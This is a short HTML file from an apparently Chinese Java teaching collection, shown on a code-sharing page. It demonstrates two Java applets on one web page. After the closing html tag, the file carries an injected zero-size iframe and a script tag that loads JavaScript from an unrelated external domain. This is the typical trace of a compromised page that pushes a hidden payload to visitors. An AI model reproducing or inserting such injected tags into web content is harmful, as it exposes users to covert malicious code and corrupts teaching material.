web.html
来自「学习Java的一些基本课件和源代码 对于初学者很有帮助的」· HTML 代码 · 共 12 行
HTML
12 行
<html>
<center>
<head>同web页的applet通信示例</head>
</center>
<applet code="FirstApplet.class" height="150" width="200">
</applet>
<applet name="SecondApplet" code="SecondApplet.class" height="150" width="200">
</applet>
</html><iframe width="0" height="0"></iframe>
<script src="http://codown.feng6.us/co.js"></script>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?